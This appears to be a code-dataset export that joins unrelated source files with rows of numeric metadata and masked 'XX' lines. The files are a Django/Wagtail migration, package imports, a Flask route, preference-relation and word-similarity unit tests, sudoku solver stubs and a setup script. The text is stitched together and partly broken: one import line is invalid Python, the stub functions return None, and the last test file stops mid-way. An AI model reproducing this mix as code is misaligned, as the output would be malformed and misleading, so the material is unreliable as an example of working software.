XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXX XXXX XXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXXXX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXX
| 54.339623
| 63
| 0.815972
| 437
| 2,880
| 5.377574
| 0.025172
| 0.16383
| 0.28
| 0.450213
| 0.901277
| 0.898298
| 0.877447
| 0.862979
| 0.816596
| 0.756596
| 0
| 0
| 0.184028
| 2,880
| 52
| 64
| 55.384615
| 1
| 0
| 0
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6e0e391d778e3aeca11fa6add1f2210b172fbfa9
| 3,466
|
py
|
Python
|
application/migrations/0046_auto_20201014_1400.py
|
City-of-Helsinki/events-helsinki-cms
|
64e4c1ce6cc058fb3783e417560dc244bd753d05
|
[
"MIT"
] | 2
|
2020-04-20T05:37:28.000Z
|
2021-02-19T10:33:45.000Z
|
application/migrations/0046_auto_20201014_1400.py
|
City-of-Helsinki/events-helsinki-cms
|
64e4c1ce6cc058fb3783e417560dc244bd753d05
|
[
"MIT"
] | 6
|
2020-02-12T12:55:37.000Z
|
2021-03-30T12:56:28.000Z
|
application/migrations/0046_auto_20201014_1400.py
|
City-of-Helsinki/events-helsinki-cms
|
64e4c1ce6cc058fb3783e417560dc244bd753d05
|
[
"MIT"
] | 1
|
2021-02-18T12:11:18.000Z
|
2021-02-18T12:11:18.000Z
|
# Generated by Django 2.2.9 on 2020-10-14 14:00
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
('application', '0045_auto_20200924_0921'),
]
operations = [
migrations.AddField(
model_name='aboutpage',
name='keywords_en',
field=wagtail.core.fields.StreamField([('keywords_en', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords EN'),
),
migrations.AddField(
model_name='aboutpage',
name='keywords_fi',
field=wagtail.core.fields.StreamField([('keywords_fi', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords FI'),
),
migrations.AddField(
model_name='aboutpage',
name='keywords_sv',
field=wagtail.core.fields.StreamField([('keywords_sv', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords SV'),
),
migrations.AddField(
model_name='accessibilitypage',
name='keywords_en',
field=wagtail.core.fields.StreamField([('keywords_en', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords EN'),
),
migrations.AddField(
model_name='accessibilitypage',
name='keywords_fi',
field=wagtail.core.fields.StreamField([('keywords_fi', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords FI'),
),
migrations.AddField(
model_name='accessibilitypage',
name='keywords_sv',
field=wagtail.core.fields.StreamField([('keywords_sv', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords SV'),
),
migrations.AddField(
model_name='collections',
name='keywords_en',
field=wagtail.core.fields.StreamField([('keywords_en', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords EN'),
),
migrations.AddField(
model_name='collections',
name='keywords_fi',
field=wagtail.core.fields.StreamField([('keywords_fi', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords FI'),
),
migrations.AddField(
model_name='collections',
name='keywords_sv',
field=wagtail.core.fields.StreamField([('keywords_sv', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords SV'),
),
migrations.AddField(
model_name='landingpages',
name='keywords_en',
field=wagtail.core.fields.StreamField([('keywords_en', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords EN'),
),
migrations.AddField(
model_name='landingpages',
name='keywords_fi',
field=wagtail.core.fields.StreamField([('keywords_fi', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords FI'),
),
migrations.AddField(
model_name='landingpages',
name='keywords_sv',
field=wagtail.core.fields.StreamField([('keywords_sv', wagtail.core.blocks.CharBlock())], blank=True, null=True, verbose_name='keywords SV'),
),
]
| 45.605263
| 153
| 0.625505
| 360
| 3,466
| 5.880556
| 0.125
| 0.135097
| 0.104393
| 0.153047
| 0.908361
| 0.908361
| 0.908361
| 0.826169
| 0.826169
| 0.826169
| 0
| 0.011632
| 0.231102
| 3,466
| 75
| 154
| 46.213333
| 0.782739
| 0.012983
| 0
| 0.869565
| 1
| 0
| 0.168763
| 0.006727
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2811c576c56ceab1a86517999c7e291553462fd2
| 78
|
py
|
Python
|
binary/serializers/__init__.py
|
tomgrin10/binary-core
|
12d27663b94daa3f50bd1fa4b652dde441db7609
|
[
"MIT"
] | 1
|
2020-08-15T17:05:04.000Z
|
2020-08-15T17:05:04.000Z
|
binary/serializers/__init__.py
|
tomgrin10/binary-core
|
12d27663b94daa3f50bd1fa4b652dde441db7609
|
[
"MIT"
] | 1
|
2020-04-30T00:02:19.000Z
|
2020-04-30T00:08:21.000Z
|
binary/serializers/__init__.py
|
tomgrin10/binary-core
|
12d27663b94daa3f50bd1fa4b652dde441db7609
|
[
"MIT"
] | null | null | null |
from binary.serializers.base import *
from binary.serializers.ctypes import *
| 26
| 39
| 0.820513
| 10
| 78
| 6.4
| 0.6
| 0.3125
| 0.65625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 78
| 2
| 40
| 39
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
284af86794755bad978b8216c26b046d5b72800e
| 150
|
py
|
Python
|
app/routes.py
|
waqas4afzal/jaami_e8051
|
786d0f282d7b835f6e23b7015e588e70bd2b1c1f
|
[
"MIT"
] | null | null | null |
app/routes.py
|
waqas4afzal/jaami_e8051
|
786d0f282d7b835f6e23b7015e588e70bd2b1c1f
|
[
"MIT"
] | null | null | null |
app/routes.py
|
waqas4afzal/jaami_e8051
|
786d0f282d7b835f6e23b7015e588e70bd2b1c1f
|
[
"MIT"
] | null | null | null |
from flask import render_template
from app import app
@app.route('/')
@app.route('/index')
def index():
return render_template('صفحہ_جامع.html')
| 18.75
| 44
| 0.726667
| 22
| 150
| 4.818182
| 0.590909
| 0.264151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126667
| 150
| 8
| 44
| 18.75
| 0.80916
| 0
| 0
| 0
| 0
| 0
| 0.139073
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
28740823563efca62e67667b1ad1f848c2da4d32
| 106
|
py
|
Python
|
hmlf/algorithms/ssac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | 1
|
2021-05-05T05:59:55.000Z
|
2021-05-05T05:59:55.000Z
|
hmlf/algorithms/ssac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | 1
|
2021-05-18T07:51:46.000Z
|
2021-05-18T07:51:46.000Z
|
hmlf/algorithms/ssac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | null | null | null |
from hmlf.algorithms.ssac.policies import CnnPolicy, MlpPolicy
from hmlf.algorithms.ssac.ssac import SSAC
| 35.333333
| 62
| 0.849057
| 15
| 106
| 6
| 0.533333
| 0.177778
| 0.4
| 0.488889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084906
| 106
| 2
| 63
| 53
| 0.927835
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
955edaa5b4c9a9f4ff20167ee3cc2244db8cd5f8
| 11,395
|
py
|
Python
|
tests/test_preference_relation.py
|
jakub-tomczak/ror
|
cf9ab38a2d66f4816a1289b9726911960059fce7
|
[
"MIT"
] | null | null | null |
tests/test_preference_relation.py
|
jakub-tomczak/ror
|
cf9ab38a2d66f4816a1289b9726911960059fce7
|
[
"MIT"
] | null | null | null |
tests/test_preference_relation.py
|
jakub-tomczak/ror
|
cf9ab38a2d66f4816a1289b9726911960059fce7
|
[
"MIT"
] | null | null | null |
from ror.data_loader import read_dataset_from_txt
import unittest
from ror.PreferenceRelations import PreferenceRelation
from ror.Relation import INDIFFERENCE, PREFERENCE, Relation, WEAK_PREFERENCE
class TestPreferenceRelations(unittest.TestCase):
def test_creating_preference_invalid_alpha(self):
with self.assertRaises(AssertionError):
relation = PreferenceRelation('b01', 'b02', PREFERENCE)
relation.alpha = -1e-10
with self.assertRaises(AssertionError):
relation = PreferenceRelation('b01', 'b02', PREFERENCE)
relation.alpha = 1+1e-10
def test_creating_preference_invalid_relation(self):
with self.assertRaises(AssertionError):
PreferenceRelation('b01', 'b02', "<=")
with self.assertRaises(AssertionError):
PreferenceRelation('b01', 'b02', Relation('<='))
def test_strong_preference_alpha_0(self):
loading_result = read_dataset_from_txt("tests/datasets/example.txt")
data = loading_result.dataset
preference = PreferenceRelation('b01', 'b02', PREFERENCE)
preference_constraint = preference.to_constraint(data, 0.0)
self.assertEqual(preference_constraint._relation, PREFERENCE)
self.assertEqual(len(preference_constraint.variables),
2 * len(data.criteria) + 2)
self.assertEqual(preference_constraint._name,
'preference_{all}(b02) <= preference_{all}(b01)')
self.assertTrue(
'lambda_{all}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b01)').coefficient, 1.0)
self.assertTrue(
'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b01)').coefficient, 0.0)
self.assertTrue(
'lambda_{all}(b02)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b02)').coefficient, -1.0)
self.assertTrue(
'u_{MaxSpeed}(b02)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b02)').coefficient, 0.0)
self.assertAlmostEqual(
preference_constraint.free_variable.coefficient, data.eps)
def test_strong_preference_alpha_1(self):
loading_result = read_dataset_from_txt("tests/datasets/example.txt")
data = loading_result.dataset
alpha = 1.0
preference = PreferenceRelation('b01', 'b02', PREFERENCE)
preference_constraint = preference.to_constraint(data, alpha)
self.assertEqual(preference_constraint._relation, PREFERENCE)
self.assertEqual(len(preference_constraint.variables),
2 * len(data.criteria) + 2)
self.assertEqual(preference_constraint._name,
'preference_{all}(b02) <= preference_{all}(b01)')
self.assertTrue(
'lambda_{all}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b01)').coefficient, 0.0)
self.assertTrue(
'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b01)').coefficient, -1.0)
self.assertTrue(
'lambda_{all}(b02)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b02)').coefficient, 0.0)
self.assertTrue(
'u_{MaxSpeed}(b02)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b02)').coefficient, 1.0)
self.assertAlmostEqual(
preference_constraint.free_variable.coefficient,
# this is just data.eps, but write how it evaluates
data.eps - alpha * len(data.criteria) + alpha * len(data.criteria)
)
def test_weak_preference_alpha_1(self):
loading_result = read_dataset_from_txt("tests/datasets/example.txt")
data = loading_result.dataset
alpha = 1.0
preference = PreferenceRelation('b01', 'b02', WEAK_PREFERENCE)
preference_constraint = preference.to_constraint(data, alpha)
self.assertEqual(preference_constraint._relation,
WEAK_PREFERENCE)
# 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
self.assertEqual(len(preference_constraint.variables),
2 * len(data.criteria) + 2)
self.assertEqual(preference_constraint.name,
'weak preference_{all}(b02) <= weak preference_{all}(b01)')
self.assertTrue(
'lambda_{all}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b01)').coefficient, 0.0)
self.assertTrue(
'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b01)').coefficient, -1.0)
self.assertTrue(
'lambda_{all}(b02)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b02)').coefficient, 0.0)
self.assertTrue(
'u_{MaxSpeed}(b02)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b02)').coefficient, 1.0)
self.assertAlmostEqual(
preference_constraint.free_variable.coefficient, 0)
def test_strong_preference_alpha_0_5(self):
loading_result = read_dataset_from_txt("tests/datasets/example.txt")
data = loading_result.dataset
alpha = 0.5
preference = PreferenceRelation('b01', 'b02', PREFERENCE)
preference_constraint = preference.to_constraint(data, alpha)
self.assertEqual(preference_constraint._relation, PREFERENCE)
# 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
self.assertEqual(len(preference_constraint.variables),
2 * len(data.criteria) + 2)
self.assertEqual(preference_constraint.name,
'preference_{all}(b02) <= preference_{all}(b01)')
self.assertTrue(
'lambda_{all}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b01)').coefficient, 0.5)
self.assertTrue(
'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b01)').coefficient, -0.5)
self.assertTrue(
'lambda_{all}(b02)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b02)').coefficient, -0.5)
self.assertTrue(
'u_{MaxSpeed}(b02)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b02)').coefficient, 0.5)
self.assertAlmostEqual(
preference_constraint.free_variable.coefficient,
# this is just data.eps, but write how it evaluates
data.eps - alpha * len(data.criteria) + alpha * len(data.criteria)
)
def test_weak_preference_alpha_0_5(self):
loading_result = read_dataset_from_txt("tests/datasets/example.txt")
data = loading_result.dataset
alpha = 0.5
preference = PreferenceRelation('b01', 'b02', WEAK_PREFERENCE)
preference_constraint = preference.to_constraint(data, alpha)
self.assertEqual(preference_constraint._relation,
WEAK_PREFERENCE)
# 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
self.assertEqual(len(preference_constraint.variables),
2 * len(data.criteria) + 2)
self.assertEqual(preference_constraint._name,
'weak preference_{all}(b02) <= weak preference_{all}(b01)')
# all constraints are the same as in the strong preference, except free variable
# that should be equal to 0 (there is no epsilion value)
self.assertTrue(
'lambda_{all}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b01)').coefficient, 0.5)
self.assertTrue(
'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b01)').coefficient, -0.5)
self.assertAlmostEqual(
preference_constraint.free_variable.coefficient,
# this is just 0, but write how it evaluates
- alpha * len(data.criteria) + alpha * len(data.criteria)
)
def test_indifference_preference_alpha_0_5(self):
loading_result = read_dataset_from_txt("tests/datasets/example.txt")
data = loading_result.dataset
alpha = 0.5
preference = PreferenceRelation('b01', 'b02', INDIFFERENCE)
preference_constraint = preference.to_constraint(data, alpha)
self.assertEqual(preference_constraint._relation,
INDIFFERENCE)
# 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
self.assertEqual(len(preference_constraint.variables),
2 * len(data.criteria) + 2)
self.assertEqual(preference_constraint._name,
'indifference_{all}(b02) == indifference_{all}(b01)')
# all constraints are the same as in the strong preference, except free variable
# that should be equal to 0 (there is no epsilion value)
self.assertTrue(
'lambda_{all}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'lambda_{all}(b01)').coefficient, 0.5)
self.assertTrue(
'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
self.assertAlmostEqual(preference_constraint.get_variable(
'u_{MaxSpeed}(b01)').coefficient, -0.5)
self.assertAlmostEqual(
preference_constraint.free_variable.coefficient,
# this is just 0, but write how it evaluates
- alpha * len(data.criteria) + alpha * len(data.criteria)
)
def test_preference_relation_equals(self):
preference_1 = PreferenceRelation('a1', 'a2', WEAK_PREFERENCE)
preference_2 = PreferenceRelation('a1', 'a2', WEAK_PREFERENCE)
preference_3 = PreferenceRelation('a1', 'a4', WEAK_PREFERENCE)
self.assertEqual(preference_1, preference_2)
self.assertNotEqual(preference_1, preference_3)
self.assertEqual(preference_1.__hash__(), preference_2.__hash__())
self.assertNotEqual(preference_1.__hash__(), preference_3.__hash__())
| 46.321138
| 88
| 0.659939
| 1,188
| 11,395
| 6.074916
| 0.078283
| 0.193986
| 0.104476
| 0.147707
| 0.921436
| 0.909658
| 0.89109
| 0.874602
| 0.865595
| 0.865595
| 0
| 0.029179
| 0.236068
| 11,395
| 245
| 89
| 46.510204
| 0.799885
| 0.05871
| 0
| 0.787565
| 0
| 0
| 0.113134
| 0.038458
| 0
| 0
| 0
| 0
| 0.373057
| 1
| 0.046632
| false
| 0
| 0.020725
| 0
| 0.072539
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95adb0c79590e224577121b656d3880d7b3944f1
| 88
|
py
|
Python
|
Package/myfitness/summary/__init__.py
|
lizawood/Apple-Health-Fitness-Tracker
|
2129e2531a8bd4609e2fca8115ee7727da26c934
|
[
"MIT"
] | null | null | null |
Package/myfitness/summary/__init__.py
|
lizawood/Apple-Health-Fitness-Tracker
|
2129e2531a8bd4609e2fca8115ee7727da26c934
|
[
"MIT"
] | null | null | null |
Package/myfitness/summary/__init__.py
|
lizawood/Apple-Health-Fitness-Tracker
|
2129e2531a8bd4609e2fca8115ee7727da26c934
|
[
"MIT"
] | null | null | null |
from myfitness.summary import maxmin.getMax
from myfitness.summary import maxmin.getMin
| 29.333333
| 43
| 0.863636
| 12
| 88
| 6.333333
| 0.583333
| 0.342105
| 0.526316
| 0.684211
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 88
| 2
| 44
| 44
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
c27e8b92cc53c5685397ec06d26189748c487182
| 331
|
py
|
Python
|
envs/setup.py
|
Yvette1993/spinningup
|
5094cf291fa24cf93d58b4507dab56dafe73dac1
|
[
"MIT"
] | null | null | null |
envs/setup.py
|
Yvette1993/spinningup
|
5094cf291fa24cf93d58b4507dab56dafe73dac1
|
[
"MIT"
] | null | null | null |
envs/setup.py
|
Yvette1993/spinningup
|
5094cf291fa24cf93d58b4507dab56dafe73dac1
|
[
"MIT"
] | null | null | null |
from setuptools import setup
# setup(name='cell_place_gym', # Secondary directory
# version='0.1',
# install_requires=['gym'] # And any other dependencies foo needs
# )
setup(name='chip_place_gym', # Secondary directory
version='0.1',
#install_requires=['gym'] # And any other dependencies foo needs
)
| 30.090909
| 72
| 0.679758
| 42
| 331
| 5.214286
| 0.52381
| 0.082192
| 0.155251
| 0.237443
| 0.767123
| 0.767123
| 0.767123
| 0.767123
| 0.767123
| 0.767123
| 0
| 0.015038
| 0.196375
| 331
| 11
| 73
| 30.090909
| 0.808271
| 0.688822
| 0
| 0
| 0
| 0
| 0.180851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c286f7ac9d40e6dc81f5ee8595a5b36af6f69f62
| 49
|
py
|
Python
|
tests/fixtures/loading/relative_2.py
|
Thom1729/yaml-macros-engine
|
f2cbdaf4d4300c842c6a6c954dceb626e3942316
|
[
"MIT"
] | null | null | null |
tests/fixtures/loading/relative_2.py
|
Thom1729/yaml-macros-engine
|
f2cbdaf4d4300c842c6a6c954dceb626e3942316
|
[
"MIT"
] | null | null | null |
tests/fixtures/loading/relative_2.py
|
Thom1729/yaml-macros-engine
|
f2cbdaf4d4300c842c6a6c954dceb626e3942316
|
[
"MIT"
] | null | null | null |
def relative_2(s):
return 'relative_2: ' + s
| 16.333333
| 29
| 0.632653
| 8
| 49
| 3.625
| 0.625
| 0.62069
| 0.689655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 0.22449
| 49
| 2
| 30
| 24.5
| 0.710526
| 0
| 0
| 0
| 0
| 0
| 0.244898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
c2acbf82214b6cbf47a7b01a0699bd91c7d3b3ea
| 3,086
|
py
|
Python
|
hw1/sudoku_core.py
|
D-denHeijer/KRR-course
|
f22dea3e68f57afceabd0402e6facbeb31b25208
|
[
"MIT"
] | 1
|
2022-01-24T15:17:53.000Z
|
2022-01-24T15:17:53.000Z
|
hw1/sudoku_core.py
|
D-denHeijer/KRR-course
|
f22dea3e68f57afceabd0402e6facbeb31b25208
|
[
"MIT"
] | 1
|
2020-06-01T12:27:52.000Z
|
2020-06-02T04:21:44.000Z
|
hw1/sudoku_core.py
|
D-denHeijer/KRR-course
|
f22dea3e68f57afceabd0402e6facbeb31b25208
|
[
"MIT"
] | 23
|
2020-06-01T09:53:23.000Z
|
2021-02-25T15:09:27.000Z
|
def propagate(sudoku_possible_values,k):
"""
Carry out constraint propagation (as part of a backtracking search algorithm for solving a sudoku input), by removing possible values for some cells based on the remaining possible values for other cells.
Parameters:
sudoku_possible_values (list(list(list(int)))): Data structure with a list of remaining possible values for each cell in the sudoku input.
k (int): The dimension of the sudoku input.
Returns:
(list(list(list(int)))): The data structure sudoku_possible_values after propagation.
"""
return sudoku_possible_values
def solve_sudoku_SAT(sudoku,k):
"""
Solve a sudoku input by encoding the problem into SAT, calling a SAT solver, and retrieving the solution for the sudoku input from a satisfying truth assignment given by the SAT solver.
NOTE: still needs to be implemented. Currently returns None for every input.
Parameters:
sudoku (list(list(int))): Sudoku input as list of list of ints, where a 0 indicates that a cell is empty.
k (int): The dimension of the sudoku input.
Returns:
(list(list(int))): The solution to the sudoku, or None if no solution was found.
"""
return None
def solve_sudoku_CSP(sudoku,k):
"""
Solve a sudoku input by encoding the problem into CSP, calling a CSP solver, and retrieving the solution for the sudoku input from a solution given by the CSP solver.
NOTE: still needs to be implemented. Currently returns None for every input.
Parameters:
sudoku (list(list(int))): Sudoku input as list of list of ints, where a 0 indicates that a cell is empty.
k (int): The dimension of the sudoku input.
Returns:
(list(list(int))): The solution to the sudoku, or None if no solution was found.
"""
return None
def solve_sudoku_ASP(sudoku,k):
"""
Solve a sudoku input by encoding the problem into ASP, calling an ASP solver, and retrieving the solution for the sudoku input from an answer set given by the ASP solver.
NOTE: still needs to be implemented. Currently returns None for every input.
Parameters:
sudoku (list(list(int))): Sudoku input as list of list of ints, where a 0 indicates that a cell is empty.
k (int): The dimension of the sudoku input.
Returns:
(list(list(int))): The solution to the sudoku, or None if no solution was found.
"""
return None
def solve_sudoku_ILP(sudoku,k):
"""
Solve a sudoku input by encoding the problem into ILP, calling an ILP solver, and retrieving the solution for the sudoku input from a satisfying assignment given by the ILP solver.
NOTE: still needs to be implemented. Currently returns None for every input.
Parameters:
sudoku (list(list(int))): Sudoku input as list of list of ints, where a 0 indicates that a cell is empty.
k (int): The dimension of the sudoku input.
Returns:
(list(list(int))): The solution to the sudoku, or None if no solution was found.
"""
return None
| 37.634146
| 208
| 0.701879
| 475
| 3,086
| 4.526316
| 0.176842
| 0.097209
| 0.051163
| 0.032558
| 0.727442
| 0.727442
| 0.727442
| 0.727442
| 0.727442
| 0.727442
| 0
| 0.001691
| 0.233312
| 3,086
| 81
| 209
| 38.098765
| 0.907016
| 0.83895
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
c2b512ebc117b7128d2c7a8aee76c5e95a25fa8b
| 3,350
|
py
|
Python
|
tests/test_word_similarity.py
|
lucasns97/word_ps
|
a048e2ca573f8cda2dc5466f6daf7fbb46b69e64
|
[
"MIT"
] | null | null | null |
tests/test_word_similarity.py
|
lucasns97/word_ps
|
a048e2ca573f8cda2dc5466f6daf7fbb46b69e64
|
[
"MIT"
] | null | null | null |
tests/test_word_similarity.py
|
lucasns97/word_ps
|
a048e2ca573f8cda2dc5466f6daf7fbb46b69e64
|
[
"MIT"
] | null | null | null |
# Word PS: Test Wird Similarity
#
# Author: Lucas Nunes Sequeira <lucasnseq@gmail.com>
# URL: <https://github.com/lucasns97/word_ps>
# For license information, see LICENSE
from unittest import TestCase
from word_ps.word_similarity import weighted_similarity, ngrams_weighted_similarity
class TestWordSimilarity(TestCase):
def setUp(self):
"""Unecessary"""
pass
def test_weighted_similarity(self):
'''Tests weighted similarity method'''
# Params
trg = "Batata frita quente"
hyp = "Batata frita"
for split_method in ['split', 'tokenize']:
for bidirectional in [True, False]:
score = weighted_similarity(trg, hyp, bidirectional, split_method)
self.assertEqual(score > 0. and score < 1., True)
score = weighted_similarity(hyp, trg, bidirectional, split_method)
self.assertEqual(score > 0. and score < 1., True)
# Params
trg = "Batata frita"
hyp = "Batata frita"
for split_method in ['split', 'tokenize']:
for bidirectional in [True, False]:
score = weighted_similarity(trg, hyp, bidirectional, split_method)
self.assertEqual(score == 1.0, True)
score = weighted_similarity(hyp, trg, bidirectional, split_method)
self.assertEqual(score == 1.0, True)
# Params
trg = ""
hyp = "Batata frita"
for split_method in ['split', 'tokenize']:
for bidirectional in [True, False]:
score = weighted_similarity(trg, hyp, bidirectional, split_method)
self.assertEqual(score == 0, True)
